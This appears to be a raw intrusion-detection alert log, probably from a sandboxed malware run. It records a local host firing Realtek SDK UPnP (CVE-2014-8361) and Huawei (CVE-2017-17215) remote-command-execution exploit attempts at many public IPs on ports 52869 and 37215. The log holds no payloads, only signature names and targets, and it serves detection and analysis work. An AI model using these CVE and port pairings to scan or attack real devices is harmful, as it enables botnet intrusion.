                                                07/20/24-23:05:38.441411TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613902252869192.168.2.14106.241.87.67
                                                07/20/24-23:05:35.220141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5588852869192.168.2.1462.5.163.114
                                                07/20/24-23:06:02.049331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3408052869192.168.2.14182.249.57.247
                                                07/20/24-23:05:45.412130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956237215192.168.2.14197.104.169.8
                                                07/20/24-23:05:58.854548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3660652869192.168.2.14189.143.163.228
                                                07/20/24-23:06:01.978394TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24089252869192.168.2.1496.35.224.207
                                                07/20/24-23:06:18.484078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613602252869192.168.2.148.221.108.93
                                                07/20/24-23:05:35.369631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4683652869192.168.2.14216.17.47.144
                                                07/20/24-23:05:40.325933TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24286852869192.168.2.14191.244.73.243
                                                07/20/24-23:05:44.332694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4200452869192.168.2.1459.125.137.153
                                                07/20/24-23:05:39.394269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4492252869192.168.2.1418.89.154.147
                                                07/20/24-23:05:52.570741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26006252869192.168.2.14155.98.10.133
                                                07/20/24-23:07:02.684157TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615210452869192.168.2.1469.183.175.186
                                                07/20/24-23:05:48.783693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5026237215192.168.2.14157.42.31.161
                                                07/20/24-23:06:05.685689TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613360252869192.168.2.1478.18.150.141
                                                07/20/24-23:05:57.804757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614282452869192.168.2.14105.53.110.200
                                                07/20/24-23:05:37.440287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3434052869192.168.2.1452.136.210.121
                                                07/20/24-23:05:37.462705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26093652869192.168.2.14175.166.165.48
                                                07/20/24-23:05:45.376608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016637215192.168.2.1441.239.164.123
                                                07/20/24-23:06:02.165979TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25831852869192.168.2.14123.96.193.240
                                                07/20/24-23:06:42.331305TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614918852869192.168.2.14152.112.48.167
                                                07/20/24-23:05:40.355766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3840652869192.168.2.14203.216.179.118
                                                07/20/24-23:06:00.037207TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615212652869192.168.2.14122.235.119.72
                                                07/20/24-23:06:35.375826TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615908052869192.168.2.14170.69.211.217
                                                07/20/24-23:05:50.542034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591437215192.168.2.1441.173.67.64
                                                07/20/24-23:05:52.554753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4803052869192.168.2.1476.156.13.20
                                                07/20/24-23:05:39.055909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737437215192.168.2.14197.81.83.46
                                                07/20/24-23:06:56.877705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24016052869192.168.2.14192.34.4.75
                                                07/20/24-23:06:13.793654TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615694852869192.168.2.14184.13.80.10
                                                07/20/24-23:06:31.457622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5507652869192.168.2.14167.193.31.8
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997437215192.168.2.14106.255.94.31
                                                07/20/24-23:05:47.398358TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3687852869192.168.2.14207.223.84.204
                                                07/20/24-23:05:48.748553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118237215192.168.2.1441.108.224.194
                                                07/20/24-23:06:10.357307TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4083452869192.168.2.1444.212.106.74
                                                07/20/24-23:05:56.056582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478237215192.168.2.1439.111.205.169
                                                07/20/24-23:06:00.426771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613842252869192.168.2.14123.128.247.166
                                                07/20/24-23:05:59.119988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5524852869192.168.2.144.91.9.190
                                                07/20/24-23:06:00.018611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4202652869192.168.2.14216.198.201.137
                                                07/20/24-23:06:05.864515TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23664852869192.168.2.14114.97.238.55
                                                07/20/24-23:06:02.272029TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25252252869192.168.2.14147.234.87.243
                                                07/20/24-23:05:39.035942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907437215192.168.2.14149.34.24.190
                                                07/20/24-23:05:58.253105TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23983852869192.168.2.1467.42.219.248
                                                07/20/24-23:05:40.361541TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23572852869192.168.2.14126.55.207.112
                                                07/20/24-23:05:42.245742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330037215192.168.2.14168.46.26.17
                                                07/20/24-23:05:59.404140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3482452869192.168.2.1477.177.17.23
                                                07/20/24-23:05:58.747598TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615065052869192.168.2.144.132.146.66
                                                07/20/24-23:05:37.542495TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23763852869192.168.2.1465.108.13.201
                                                07/20/24-23:06:00.572173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5939052869192.168.2.14221.88.192.249
                                                07/20/24-23:06:24.512033TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615166652869192.168.2.1470.225.101.174
                                                07/20/24-23:05:40.353037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569652869192.168.2.14193.25.57.29
                                                07/20/24-23:05:39.039093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956837215192.168.2.14157.122.231.251
                                                07/20/24-23:05:33.830570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217637215192.168.2.14198.80.229.185
                                                07/20/24-23:05:42.257817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225837215192.168.2.1441.96.28.202
                                                07/20/24-23:05:57.457796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615952252869192.168.2.14134.176.234.249
                                                07/20/24-23:06:16.602976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4643052869192.168.2.1419.150.44.143
                                                07/20/24-23:05:40.468265TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23908852869192.168.2.14203.213.235.166
                                                07/20/24-23:06:01.940214TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26085252869192.168.2.14161.14.214.31
                                                07/20/24-23:06:00.153687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5444652869192.168.2.14103.198.111.177
                                                07/20/24-23:05:57.188540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3303452869192.168.2.14126.2.43.140
                                                07/20/24-23:05:59.413785TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614054852869192.168.2.1450.48.189.161
                                                07/20/24-23:06:08.447627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959052869192.168.2.1443.139.32.29
                                                07/20/24-23:06:09.697115TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615243452869192.168.2.1454.13.93.146
                                                07/20/24-23:06:19.786611TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615396852869192.168.2.14177.253.226.129
                                                07/20/24-23:05:40.439699TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26036652869192.168.2.14154.203.201.18
                                                07/20/24-23:05:56.011461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737637215192.168.2.14157.2.219.103
                                                07/20/24-23:06:02.920702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23797252869192.168.2.14189.235.177.109
                                                07/20/24-23:05:56.812610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4338052869192.168.2.14178.83.23.44
                                                07/20/24-23:06:53.291407TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25426252869192.168.2.1454.220.188.149
                                                07/20/24-23:06:11.469684TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3990652869192.168.2.1471.171.254.193
                                                07/20/24-23:05:37.453622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4256252869192.168.2.1489.77.15.240
                                                07/20/24-23:05:50.510455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4554837215192.168.2.1432.126.246.40
                                                07/20/24-23:06:17.581336TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614043852869192.168.2.1419.14.45.237
                                                07/20/24-23:05:38.486141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615631652869192.168.2.14101.65.28.197
                                                07/20/24-23:06:01.785367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4810052869192.168.2.1478.101.209.190
                                                07/20/24-23:06:35.309569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24799452869192.168.2.1469.215.220.54
                                                07/20/24-23:06:06.210098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3295252869192.168.2.1492.213.45.240
                                                07/20/24-23:05:37.575243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5451452869192.168.2.1473.174.204.179
                                                07/20/24-23:06:02.517784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4847052869192.168.2.1467.83.53.203
                                                07/20/24-23:05:46.374064TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615618652869192.168.2.1413.248.239.26
                                                07/20/24-23:05:48.807124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845037215192.168.2.1441.227.205.171
                                                07/20/24-23:05:52.475330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3557452869192.168.2.1475.62.163.102
                                                07/20/24-23:05:37.441223TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25738452869192.168.2.14159.94.41.117
                                                07/20/24-23:05:52.528818TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23877852869192.168.2.14156.242.205.254
                                                07/20/24-23:05:47.306586TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4870052869192.168.2.14176.247.246.75
                                                07/20/24-23:05:36.248451TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615781252869192.168.2.1444.6.194.12
                                                07/20/24-23:06:16.287042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4721852869192.168.2.1493.129.164.15
                                                07/20/24-23:06:29.347952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615198852869192.168.2.14203.118.70.153
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704437215192.168.2.1441.179.93.180
                                                07/20/24-23:05:33.827209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363837215192.168.2.14197.164.78.122
                                                07/20/24-23:05:59.385840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5865852869192.168.2.14172.65.163.145
                                                07/20/24-23:05:34.625707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427637215192.168.2.1441.13.154.17
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748837215192.168.2.14197.188.241.66
                                                07/20/24-23:05:45.090337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4779652869192.168.2.1420.92.193.38
                                                07/20/24-23:07:03.123324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4570852869192.168.2.14135.95.234.162
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625237215192.168.2.14120.191.233.247
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699037215192.168.2.14157.40.221.74
                                                07/20/24-23:05:37.527690TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23425852869192.168.2.14205.8.145.6
                                                07/20/24-23:05:40.446932TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23744052869192.168.2.14136.196.140.175
                                                07/20/24-23:05:58.217467TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614940852869192.168.2.14218.24.116.194
                                                07/20/24-23:05:37.556779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4475452869192.168.2.14196.32.183.241
                                                07/20/24-23:05:39.771399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3848037215192.168.2.14157.115.243.103
                                                07/20/24-23:06:07.419849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5855637215192.168.2.14157.59.162.37
                                                07/20/24-23:06:15.005196TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615014852869192.168.2.14125.22.166.59
                                                07/20/24-23:05:59.445692TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912452869192.168.2.1468.182.243.39
                                                07/20/24-23:06:29.433951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615295452869192.168.2.145.229.68.58
                                                07/20/24-23:06:02.120842TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5065852869192.168.2.14201.157.202.52
                                                07/20/24-23:05:45.409134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079037215192.168.2.14197.1.140.249
                                                07/20/24-23:05:59.374360TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23455052869192.168.2.14220.66.34.165
                                                07/20/24-23:06:58.157771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4938452869192.168.2.14204.183.12.81
                                                07/20/24-23:05:37.440397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5895452869192.168.2.14133.8.172.164
                                                07/20/24-23:06:01.556801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3934652869192.168.2.14204.53.157.110
                                                07/20/24-23:06:01.650758TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25040452869192.168.2.14164.94.110.129
                                                07/20/24-23:05:36.426127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6061652869192.168.2.14164.159.1.86
                                                07/20/24-23:05:52.527430TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24819452869192.168.2.1451.1.181.74
                                                07/20/24-23:05:57.181050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615596852869192.168.2.14169.22.244.181
                                                07/20/24-23:05:56.022964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964237215192.168.2.14197.174.98.141
                                                07/20/24-23:06:44.210907TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928252869192.168.2.14216.73.223.205
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465637215192.168.2.14197.204.66.242
                                                07/20/24-23:06:03.476247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021037215192.168.2.14197.49.59.104
                                                07/20/24-23:05:48.788274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293037215192.168.2.1453.9.120.228
                                                07/20/24-23:05:59.370742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3285452869192.168.2.141.65.215.231
                                                07/20/24-23:05:36.287798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5383652869192.168.2.14115.97.137.57
                                                07/20/24-23:05:57.811975TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614013852869192.168.2.14191.202.11.9
                                                07/20/24-23:06:21.074396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3769852869192.168.2.14111.174.133.174
                                                07/20/24-23:05:38.497508TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3867652869192.168.2.14153.214.17.177
                                                07/20/24-23:05:42.220682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3990037215192.168.2.14197.158.46.80
                                                07/20/24-23:05:44.346058TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5085252869192.168.2.1448.41.41.245
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982237215192.168.2.14157.94.209.230
                                                07/20/24-23:05:59.436745TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614122652869192.168.2.14151.48.203.94
                                                07/20/24-23:07:47.118980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4338852869192.168.2.1438.245.190.228
                                                07/20/24-23:05:57.913786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5722252869192.168.2.14128.239.71.215
                                                07/20/24-23:05:59.355668TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5589052869192.168.2.14168.255.68.251
                                                07/20/24-23:06:09.587283TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25773052869192.168.2.14206.252.90.242
                                                07/20/24-23:05:40.341196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24048652869192.168.2.1412.148.108.18
                                                07/20/24-23:05:52.554950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25560452869192.168.2.14104.253.137.229
                                                07/20/24-23:05:37.459218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23352652869192.168.2.14106.240.191.91
                                                07/20/24-23:06:11.207362TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614859452869192.168.2.14206.40.4.199
                                                07/20/24-23:06:29.715968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5835052869192.168.2.14115.192.236.13
                                                07/20/24-23:06:01.903875TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25579652869192.168.2.14169.21.93.225
                                                07/20/24-23:05:40.423413TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26026052869192.168.2.14128.15.34.80
                                                07/20/24-23:06:10.376181TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25686852869192.168.2.14124.231.89.13
                                                07/20/24-23:05:39.351353TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614387252869192.168.2.14110.4.207.154
                                                07/20/24-23:07:31.562284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614091452869192.168.2.14197.209.68.8
                                                07/20/24-23:05:52.571724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4998652869192.168.2.1499.123.61.15
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.14157.114.15.111
                                                07/20/24-23:06:33.955474TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615286852869192.168.2.14192.147.19.189
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539837215192.168.2.14157.155.242.238
                                                07/20/24-23:05:42.257476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3833637215192.168.2.1441.50.5.23
                                                07/20/24-23:06:35.384402TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4861052869192.168.2.14154.241.16.98
                                                07/20/24-23:06:02.312606TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613721852869192.168.2.1420.251.138.185
                                                07/20/24-23:06:02.508900TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5698252869192.168.2.14168.255.68.251
                                                07/20/24-23:06:02.167111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766652869192.168.2.14151.153.74.124
                                                07/20/24-23:06:14.511508TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25569452869192.168.2.14217.27.61.129
                                                07/20/24-23:05:37.465013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473052869192.168.2.14210.141.252.193
                                                07/20/24-23:06:16.552344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839637215192.168.2.1441.72.188.89
                                                07/20/24-23:05:57.865744TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4402852869192.168.2.14199.88.11.180
                                                07/20/24-23:05:58.102253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615080652869192.168.2.1469.41.19.44
                                                07/20/24-23:06:07.773969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24795252869192.168.2.14102.178.124.219
                                                07/20/24-23:07:26.028529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614232052869192.168.2.14200.224.84.86
                                                07/20/24-23:06:01.986039TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25853452869192.168.2.14201.146.209.197
                                                07/20/24-23:07:08.369781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3454852869192.168.2.14113.35.97.192
                                                07/20/24-23:05:59.164789TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24552252869192.168.2.14154.15.57.14
                                                07/20/24-23:05:39.156296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3661052869192.168.2.14204.228.34.103
                                                07/20/24-23:05:36.291604TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615163652869192.168.2.14212.202.97.136
                                                07/20/24-23:07:11.472742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683437215192.168.2.1441.239.97.98
                                                07/20/24-23:05:57.170112TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3790652869192.168.2.14165.91.143.33
                                                07/20/24-23:05:40.458812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711252869192.168.2.1434.80.28.184
                                                07/20/24-23:05:45.412130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032837215192.168.2.1441.61.69.117
                                                07/20/24-23:05:59.091811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615426452869192.168.2.14211.118.237.168
                                                07/20/24-23:05:57.651872TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24511252869192.168.2.14120.75.230.210
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5897237215192.168.2.14157.213.228.184
                                                07/20/24-23:06:01.318185TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4273252869192.168.2.14129.180.128.160
                                                07/20/24-23:06:01.219202TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613591652869192.168.2.14114.97.238.55
                                                07/20/24-23:05:52.535101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25781052869192.168.2.14113.82.161.254
                                                07/20/24-23:05:37.472705TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23369452869192.168.2.1470.127.37.49
                                                07/20/24-23:06:25.602644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3299452869192.168.2.14200.157.116.174
                                                07/20/24-23:05:39.771399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373437215192.168.2.1412.22.126.65
